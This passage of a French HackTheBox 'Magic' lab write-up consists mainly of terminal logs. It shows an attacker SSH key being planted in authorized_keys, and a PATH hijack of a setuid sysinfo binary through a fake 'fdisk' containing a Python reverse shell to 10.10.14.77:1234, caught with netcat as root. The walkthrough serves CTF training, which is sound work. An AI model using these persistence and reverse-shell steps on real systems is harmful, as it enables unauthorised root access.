ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC69tl7R/xbvIsvhiU2Rx4DmtN2qJTfBlRZAWmqNRB+VGEfVh4CVmHkOrVifXPQQVqxWEhc9OtFe3iDTPtDzuIRf6/IR2j9P11Om90I+DIuSnunwBM0eVVf0Ygwq6aWyi5+1uciW0oonsd6KeEwPiUCRNOnLfF9fcSvSksrvaHQHYxft9BhTIIm/4a4hmMB2uPeJ8UuV3Irm4UfSa8R9Z+e2DbvhHE7lgYdsoHs/pGog4DhQif0UV/cWsygjAhSsME87rp7ovmTlqfOgOdG9nXPwHgbBujA+0LnZAwAzvZdb6+GTpMkKeyCeN5Megx8/0uejHtqSFyz+UfPyD96/J0J5SropAhHUjmEgcbozxzTtBcb2kg6oYAskLnmmBhYvIj1NglOFBXFG8H/kxwW4rQMn+eeKoy9d0ZM7qCqkDjW8w//UA86aha0LVq1HfGnu+L5/eBa9CN309l2HyAHVuRFqvVc3DNQDCX0ER0S8eTPSMI1jjqyxpzU18xC+Qix7qE= root@Host-001
root@Host-001:~/Bureau/htb/magic# 
theseus@ubuntu:~/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC69tl7R/xbvIsvhiU2Rx4DmtN2qJTfBlRZAWmqNRB+VGEfVh4CVmHkOrVifXPQQVqxWEhc9OtFe3iDTPtDzuIRf6/IR2j9P11Om90I+DIuSnunwBM0eVVf0Ygwq6aWyi5+1uciW0oonsd6KeEwPiUCRNOnLfF9fcSvSksrvaHQHYxft9BhTIIm/4a4hmMB2uPeJ8UuV3Irm4UfSa8R9Z+e2DbvhHE7lgYdsoHs/pGog4DhQif0UV/cWsygjAhSsME87rp7ovmTlqfOgOdG9nXPwHgbBujA+0LnZAwAzvZdb6+GTpMkKeyCeN5Megx8/0uejHtqSFyz+UfPyD96/J0J5SropAhHUjmEgcbozxzTtBcb2kg6oYAskLnmmBhYvIj1NglOFBXFG8H/kxwW4rQMn+eeKoy9d0ZM7qCqkDjW8w//UA86aha0LVq1HfGnu+L5/eBa9CN309l2HyAHVuRFqvVc3DNQDCX0ER0S8eTPSMI1jjqyxpzU18xC+Qix7qE= root@Host-001" >> authorized_keys
<yxpzU18xC+Qix7qE= root@Host-001" >> authorized_keys
theseus@ubuntu:~/.ssh$ cat authorized_keys
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDxppRSGxoVEp4uvGSgicxrNS7CVyJ/GtdliKecBEsCcY6YN0QbhMx1+kKoiNHWlKWFgcCkg7SL81Yj7wcvXzjz9Jf05bdarDqqnrgn2yVZMftEdPi5yL1+URDfRfO9dvaEsIB0JUYNznRXL4nauJeGOyPdnKu5kiQq52QMu6cH8n9T5eKoqJsHBeJb14SJFRpljrGsPsYMPycZOOr3YIo/a3jLyLm7UoyRFFSJ1xtaPeIHLg+x99OZpI512gwCxZiXe7otQrlY1tKk56fnEtCAK3vuhrToc4qwzZHDc5F+jDghBT6d/QH0PU5Lc7vNcWPcbuVteKQvC83SOt/xP+alA2PXm4go9pLaE15/Cidbj4iZz9A0j2wjpEmJyESjYWRVaSL52T1FzmRpJ8kHYFYbeMy7U899Uft2zWashoP2NcsjNzlLTvmtx7AtTZH/mXj5aG/r4XvV54gtag0VawsYszvQTF3Hid6upLE4OLzmVOvk0tXmFkKkJbnW/tteNrs= root@kali
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC69tl7R/xbvIsvhiU2Rx4DmtN2qJTfBlRZAWmqNRB+VGEfVh4CVmHkOrVifXPQQVqxWEhc9OtFe3iDTPtDzuIRf6/IR2j9P11Om90I+DIuSnunwBM0eVVf0Ygwq6aWyi5+1uciW0oonsd6KeEwPiUCRNOnLfF9fcSvSksrvaHQHYxft9BhTIIm/4a4hmMB2uPeJ8UuV3Irm4UfSa8R9Z+e2DbvhHE7lgYdsoHs/pGog4DhQif0UV/cWsygjAhSsME87rp7ovmTlqfOgOdG9nXPwHgbBujA+0LnZAwAzvZdb6+GTpMkKeyCeN5Megx8/0uejHtqSFyz+UfPyD96/J0J5SropAhHUjmEgcbozxzTtBcb2kg6oYAskLnmmBhYvIj1NglOFBXFG8H/kxwW4rQMn+eeKoy9d0ZM7qCqkDjW8w//UA86aha0LVq1HfGnu+L5/eBa9CN309l2HyAHVuRFqvVc3DNQDCX0ER0S8eTPSMI1jjqyxpzU18xC+Qix7qE= root@Host-001
theseus@ubuntu:~/.ssh$ 
root@Host-001:~/Bureau/htb/magic# ssh -i id_rsa theseus@10.10.10.185
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

29 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Sat Aug  1 09:26:54 2020 from 10.10.14.141
theseus@ubuntu:~$ ls
cat	 Documents  fdisk  Pictures  Templates	Videos
Desktop  Downloads  Music  Public    user.txt
theseus@ubuntu:~$ 

On crée un shell executé par sysinfo + listener port 1234

theseus@ubuntu:/tmp/poc$ nano fdisk
theseus@ubuntu:/tmp/poc$ cat fdisk
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.77",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
theseus@ubuntu:/tmp/poc$ chmod 777 fdisk
theseus@ubuntu:/tmp/poc$ export PATH=/tmp/poc:$PATH
theseus@ubuntu:/tmp/poc$ /bin/sysinfo
====================Hardware Info====================
H/W path           Device      Class      Description
=====================================================
                               system     VMware Virtual Platform
/0                             bus        440BX Desktop Reference Platform
/0/0                           memory     86KiB BIOS
/0/1                           processor  AMD EPYC 7401P 24-Core Processor
/0/1/0                         memory     16KiB L1 cache
/0/1/1                         memory     16KiB L1 cache
/0/1/2                         memory     512KiB L2 cache
/0/1/3                         memory     512KiB L2 cache
/0/2                           processor  AMD EPYC 7401P 24-Core Processor
/0/28                          memory     System Memory
/0/28/0                        memory     4GiB DIMM DRAM EDO
/0/28/1                        memory     DIMM DRAM [empty]
/0/28/2                        memory     DIMM DRAM [empty]
/0/28/3                        memory     DIMM DRAM [empty]
/0/28/4                        memory     DIMM DRAM [empty]
/0/28/5                        memory     DIMM DRAM [empty]
/0/28/6                        memory     DIMM DRAM [empty]
/0/28/7                        memory     DIMM DRAM [empty]
/0/28/8                        memory     DIMM DRAM [empty]
/0/28/9                        memory     DIMM DRAM [empty]
/0/28/a                        memory     DIMM DRAM [empty]
/0/28/b                        memory     DIMM DRAM [empty]
/0/28/c                        memory     DIMM DRAM [empty]
/0/28/d                        memory     DIMM DRAM [empty]
/0/28/e                        memory     DIMM DRAM [empty]
/0/28/f                        memory     DIMM DRAM [empty]
/0/28/10                       memory     DIMM DRAM [empty]
/0/28/11                       memory     DIMM DRAM [empty]
/0/28/12                       memory     DIMM DRAM [empty]
/0/28/13                       memory     DIMM DRAM [empty]
/0/28/14                       memory     DIMM DRAM [empty]
/0/28/15                       memory     DIMM DRAM [empty]
/0/28/16                       memory     DIMM DRAM [empty]
/0/28/17                       memory     DIMM DRAM [empty]
/0/28/18                       memory     DIMM DRAM [empty]
/0/28/19                       memory     DIMM DRAM [empty]
/0/28/1a                       memory     DIMM DRAM [empty]
/0/28/1b                       memory     DIMM DRAM [empty]
/0/28/1c                       memory     DIMM DRAM [empty]
/0/28/1d                       memory     DIMM DRAM [empty]
/0/28/1e                       memory     DIMM DRAM [empty]
/0/28/1f                       memory     DIMM DRAM [empty]
/0/28/20                       memory     DIMM DRAM [empty]
/0/28/21                       memory     DIMM DRAM [empty]
/0/28/22                       memory     DIMM DRAM [empty]
/0/28/23                       memory     DIMM DRAM [empty]
/0/28/24                       memory     DIMM DRAM [empty]
/0/28/25                       memory     DIMM DRAM [empty]
/0/28/26                       memory     DIMM DRAM [empty]
/0/28/27                       memory     DIMM DRAM [empty]
/0/28/28                       memory     DIMM DRAM [empty]
/0/28/29                       memory     DIMM DRAM [empty]
/0/28/2a                       memory     DIMM DRAM [empty]
/0/28/2b                       memory     DIMM DRAM [empty]
/0/28/2c                       memory     DIMM DRAM [empty]
/0/28/2d                       memory     DIMM DRAM [empty]
/0/28/2e                       memory     DIMM DRAM [empty]
/0/28/2f                       memory     DIMM DRAM [empty]
/0/28/30                       memory     DIMM DRAM [empty]
/0/28/31                       memory     DIMM DRAM [empty]
/0/28/32                       memory     DIMM DRAM [empty]
/0/28/33                       memory     DIMM DRAM [empty]
/0/28/34                       memory     DIMM DRAM [empty]
/0/28/35                       memory     DIMM DRAM [empty]
/0/28/36                       memory     DIMM DRAM [empty]
/0/28/37                       memory     DIMM DRAM [empty]
/0/28/38                       memory     DIMM DRAM [empty]
/0/28/39                       memory     DIMM DRAM [empty]
/0/28/3a                       memory     DIMM DRAM [empty]
/0/28/3b                       memory     DIMM DRAM [empty]
/0/28/3c                       memory     DIMM DRAM [empty]
/0/28/3d                       memory     DIMM DRAM [empty]
/0/28/3e                       memory     DIMM DRAM [empty]
/0/28/3f                       memory     DIMM DRAM [empty]
/0/3                           memory     
/0/3/0                         memory     DIMM [empty]
/0/4                           memory     
/0/4/0                         memory     DIMM [empty]
/0/5                           memory     
/0/5/0                         memory     DIMM [empty]
/0/6                           memory     
/0/6/0                         memory     DIMM [empty]
/0/7                           memory     
/0/7/0                         memory     DIMM [empty]
/0/8                           memory     
/0/8/0                         memory     DIMM [empty]
/0/9                           memory     
/0/9/0                         memory     DIMM [empty]
/0/a                           memory     
/0/a/0                         memory     DIMM [empty]
/0/b                           memory     
/0/b/0                         memory     DIMM [empty]
/0/c                           memory     
/0/c/0                         memory     DIMM [empty]
/0/d                           memory     
/0/d/0                         memory     DIMM [empty]
/0/e                           memory     
/0/e/0                         memory     DIMM [empty]
/0/f                           memory     
/0/f/0                         memory     DIMM [empty]
/0/10                          memory     
/0/10/0                        memory     DIMM [empty]
/0/11                          memory     
/0/11/0                        memory     DIMM [empty]
/0/12                          memory     
/0/12/0                        memory     DIMM [empty]
/0/13                          memory     
/0/13/0                        memory     DIMM [empty]
/0/14                          memory     
/0/14/0                        memory     DIMM [empty]
/0/15                          memory     
/0/15/0                        memory     DIMM [empty]
/0/16                          memory     
/0/16/0                        memory     DIMM [empty]
/0/17                          memory     
/0/17/0                        memory     DIMM [empty]
/0/18                          memory     
/0/18/0                        memory     DIMM [empty]
/0/19                          memory     
/0/19/0                        memory     DIMM [empty]
/0/1a                          memory     
/0/1a/0                        memory     DIMM [empty]
/0/1b                          memory     
/0/1b/0                        memory     DIMM [empty]
/0/1c                          memory     
/0/1c/0                        memory     DIMM [empty]
/0/1d                          memory     
/0/1d/0                        memory     DIMM [empty]
/0/1e                          memory     
/0/1e/0                        memory     DIMM [empty]
/0/1f                          memory     
/0/1f/0                        memory     DIMM [empty]
/0/20                          memory     
/0/20/0                        memory     DIMM [empty]
/0/21                          memory     
/0/21/0                        memory     DIMM [empty]
/0/22                          memory     
/0/22/0                        memory     DIMM [empty]
/0/23                          memory     
/0/23/0                        memory     DIMM [empty]
/0/24                          memory     
/0/24/0                        memory     DIMM [empty]
/0/25                          memory     
/0/25/0                        memory     DIMM [empty]
/0/26                          memory     
/0/26/0                        memory     DIMM [empty]
/0/27                          memory     
/0/27/0                        memory     DIMM [empty]
/0/29                          memory     
/0/29/0                        memory     DIMM [empty]
/0/2a                          memory     
/0/2a/0                        memory     DIMM [empty]
/0/2b                          memory     
/0/2b/0                        memory     DIMM [empty]
/0/2c                          memory     
/0/2c/0                        memory     DIMM [empty]
/0/2d                          memory     
/0/2d/0                        memory     DIMM [empty]
/0/2e                          memory     
/0/2e/0                        memory     DIMM [empty]
/0/2f                          memory     
/0/2f/0                        memory     DIMM [empty]
/0/30                          memory     
/0/30/0                        memory     DIMM [empty]
/0/31                          memory     
/0/31/0                        memory     DIMM [empty]
/0/32                          memory     
/0/32/0                        memory     DIMM [empty]
/0/33                          memory     
/0/33/0                        memory     DIMM [empty]
/0/34                          memory     
/0/34/0                        memory     DIMM [empty]
/0/35                          memory     
/0/35/0                        memory     DIMM [empty]
/0/36                          memory     
/0/36/0                        memory     DIMM [empty]
/0/37                          memory     
/0/37/0                        memory     DIMM [empty]
/0/38                          memory     
/0/38/0                        memory     DIMM [empty]
/0/39                          memory     
/0/39/0                        memory     DIMM [empty]
/0/3a                          memory     
/0/3a/0                        memory     DIMM [empty]
/0/3b                          memory     
/0/3b/0                        memory     DIMM [empty]
/0/3c                          memory     
/0/3c/0                        memory     DIMM [empty]
/0/3d                          memory     
/0/3d/0                        memory     DIMM [empty]
/0/3e                          memory     
/0/3e/0                        memory     DIMM [empty]
/0/3f                          memory     
/0/3f/0                        memory     DIMM [empty]
/0/40                          memory     
/0/40/0                        memory     DIMM [empty]
/0/41                          memory     
/0/41/0                        memory     DIMM [empty]
/0/42                          memory     
/0/42/0                        memory     DIMM [empty]
/0/43                          memory     
/0/43/0                        memory     DIMM [empty]
/0/44                          memory     
/0/45                          memory     
/0/100                         bridge     440BX/ZX/DX - 82443BX/ZX/DX Host bridge
/0/100/1                       bridge     440BX/ZX/DX - 82443BX/ZX/DX AGP bridge
/0/100/7                       bridge     82371AB/EB/MB PIIX4 ISA
/0/100/7.1                     storage    82371AB/EB/MB PIIX4 IDE
/0/100/7.3                     bridge     82371AB/EB/MB PIIX4 ACPI
/0/100/7.7                     generic    Virtual Machine Communication Interface
/0/100/f                       display    SVGA II Adapter
/0/100/10          scsi2       storage    53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI
/0/100/10/0.0.0    /dev/sda    disk       21GB Virtual disk
/0/100/10/0.0.0/1  /dev/sda1   volume     19GiB EXT4 volume
/0/100/11                      bridge     PCI bridge
/0/100/11/0                    bus        USB1.1 UHCI Controller
/0/100/11/0/1      usb2        bus        UHCI Host Controller
/0/100/11/0/1/1                input      VMware Virtual USB Mouse
/0/100/11/0/1/2                bus        VMware Virtual USB Hub
/0/100/11/1                    bus        USB2 EHCI Controller
/0/100/11/1/1      usb1        bus        EHCI Host Controller
/0/100/15                      bridge     PCI Express Root Port
/0/100/15/0        ens160      network    VMXNET3 Ethernet Controller
/0/100/15.1                    bridge     PCI Express Root Port
/0/100/15.2                    bridge     PCI Express Root Port
/0/100/15.3                    bridge     PCI Express Root Port
/0/100/15.4                    bridge     PCI Express Root Port
/0/100/15.5                    bridge     PCI Express Root Port
/0/100/15.6                    bridge     PCI Express Root Port
/0/100/15.7                    bridge     PCI Express Root Port
/0/100/16                      bridge     PCI Express Root Port
/0/100/16.1                    bridge     PCI Express Root Port
/0/100/16.2                    bridge     PCI Express Root Port
/0/100/16.3                    bridge     PCI Express Root Port
/0/100/16.4                    bridge     PCI Express Root Port
/0/100/16.5                    bridge     PCI Express Root Port
/0/100/16.6                    bridge     PCI Express Root Port
/0/100/16.7                    bridge     PCI Express Root Port
/0/100/17                      bridge     PCI Express Root Port
/0/100/17.1                    bridge     PCI Express Root Port
/0/100/17.2                    bridge     PCI Express Root Port
/0/100/17.3                    bridge     PCI Express Root Port
/0/100/17.4                    bridge     PCI Express Root Port
/0/100/17.5                    bridge     PCI Express Root Port
/0/100/17.6                    bridge     PCI Express Root Port
/0/100/17.7                    bridge     PCI Express Root Port
/0/100/18                      bridge     PCI Express Root Port
/0/100/18.1                    bridge     PCI Express Root Port
/0/100/18.2                    bridge     PCI Express Root Port
/0/100/18.3                    bridge     PCI Express Root Port
/0/100/18.4                    bridge     PCI Express Root Port
/0/100/18.5                    bridge     PCI Express Root Port
/0/100/18.6                    bridge     PCI Express Root Port
/0/100/18.7                    bridge     PCI Express Root Port
/0/46              scsi0       storage    
/0/46/0.0.0        /dev/cdrom  disk       VMware IDE CDR00
/1                             system     

====================Disk Info====================

====================CPU Info====================
processor	: 0
vendor_id	: AuthenticAMD
cpu family	: 23
model		: 1
model name	: AMD EPYC 7401P 24-Core Processor
stepping	: 2
microcode	: 0x8001230
cpu MHz		: 1999.999
cache size	: 512 KB
physical id	: 0
siblings	: 1
core id		: 0
cpu cores	: 1
apicid		: 0
initial apicid	: 0
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs		: fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips	: 3999.99
TLB size	: 2560 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 43 bits physical, 48 bits virtual
power management:

processor	: 1
vendor_id	: AuthenticAMD
cpu family	: 23
model		: 1
model name	: AMD EPYC 7401P 24-Core Processor
stepping	: 2
microcode	: 0x8001230
cpu MHz		: 1999.999
cache size	: 512 KB
physical id	: 2
siblings	: 1
core id		: 0
cpu cores	: 1
apicid		: 2
initial apicid	: 2
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs		: fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips	: 3999.99
TLB size	: 2560 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 43 bits physical, 48 bits virtual
power management:


====================MEM Usage=====================
              total        used        free      shared  buff/cache   available
Mem:           3.8G        591M        1.8G        4.1M        1.5G        3.0G
Swap:          947M          0B        947M
theseus@ubuntu:/tmp/poc$ 
root@Host-001:~# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.77] from (UNKNOWN) [10.10.10.185] 38992
# id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
# cat /root/root.txt
1897a41132f21627215fbcd8a217a330
#

Poursuivez avec :

- HTB - Remote

- HTB - Write Up Machine

CC-BY

This work is licensed under a Creative Commons Attribution 4.0 International License.